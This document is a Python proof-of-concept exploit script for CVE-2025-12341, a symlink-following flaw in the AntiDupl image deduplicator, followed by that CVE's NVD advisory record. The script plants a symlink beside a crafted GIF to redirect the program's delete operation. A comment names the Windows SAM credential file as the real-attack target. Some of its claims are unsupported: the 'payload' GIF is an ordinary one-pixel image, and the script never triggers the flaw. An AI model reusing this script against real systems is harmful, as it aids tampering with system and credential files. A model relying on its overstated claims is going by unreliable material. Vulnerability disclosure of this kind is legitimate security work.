CVE-2025-12341

#!/usr/bin/env python3 """ CVE-2025-12341 PoC - AntiDupl Link Following Vulnerability This PoC demonstrates the symbolic link following vulnerability in AntiDupl's Delete Duplicate Image Handler component. Note: This is for educational and authorized security testing purposes only. """ import os import sys import shutil import tempfile from pathlib import Path def create_malicious_symlink(target_path, link_path): """ Create a symbolic link that points to a target path. On Windows, this requires administrator privileges or SeCreateSymbolicLinkPrivilege. """ try: if os.path.exists(link_path): os.remove(link_path) os.symlink(target_path, link_path) print(f"[+] Created symlink: {link_path} -> {target_path}") return True except OSError as e: print(f"[-] Failed to create symlink: {e}") return False def setup_evil_image(image_path): """ Create a malicious image file that will be processed by AntiDupl. This image contains embedded payload data. """ evil_content = b'GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x4a\x01\x00\x3b' try: with open(image_path, 'wb') as f: f.write(evil_content) print(f"[+] Created malicious image: {image_path}") return True except Exception as e: print(f"[-] Failed to create image: {e}") return False def exploit_antidupl_link_follow(workspace_dir): """ Main exploit function demonstrating the link following vulnerability. Attack scenario: 1. Attacker creates a malicious image file 2. Creates a symlink from image location to a sensitive target 3. When AntiDupl processes and 'deletes' the image, it follows the symlink 4. This can lead to arbitrary file write/overwrite """ print("[*] Setting up CVE-2025-12341 exploitation environment...") # Target paths for demonstration (use appropriate targets in real attack) target_file = os.path.join(workspace_dir, 'target_evil_file.txt') symlink_dir = os.path.join(workspace_dir, 'duplicate_images') # Create directories os.makedirs(symlink_dir, exist_ok=True) # Create malicious image image_path = os.path.join(symlink_dir, 'malicious_image.gif') setup_evil_image(image_path) # Create symlink to target location # In real attack, target would be something like C:\Windows\System32\config\SAM symlink_path = os.path.join(symlink_dir, 'duplicate_ref.gif') create_malicious_symlink(target_file, symlink_path) print("\n[*] Exploitation setup complete.") print(f"[*] When AntiDupl's Delete Duplicate Image Handler processes:") print(f"[*] - It will attempt to delete: {symlink_path}") print(f"[*] - Due to symlink following, it will operate on: {target_file}") print(f"[*] This can lead to unauthorized file modification/creation.") print("\n[!] Note: Actual exploitation requires AntiDupl to be running and") print("[!] processing the crafted duplicate image set.") return True if __name__ == '__main__': print("=" * 60) print("CVE-2025-12341 - AntiDupl Link Following Vulnerability PoC") print("=" * 60) workspace = tempfile.mkdtemp(prefix='cve202512341_') print(f"[*] Working directory: {workspace}\n") try: exploit_antidupl_link_follow(workspace) finally: # Cleanup shutil.rmtree(workspace, ignore_errors=True) print(f"\n[*] Cleaned up: {workspace}")

{"cve": {"id": "CVE-2025-12341", "sourceIdentifier": "[email protected]", "published": "2025-10-28T01:16:11.793", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in ermig1979 AntiDupl up to 2.3.12. Impacted is an unknown function of the file AntiDupl.NET.WinForms.exe of the component Delete Duplicate Image Handler. The manipulation results in link following. The attack is only possible with local access. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 6.8, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://drive.google.com/file/d/19jwaqUji6O3U6EAeUMixBM58QTc4qNMQ/view?usp=sharing", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.330127", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.330127", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.674515", "source": "[email protected]"}]}}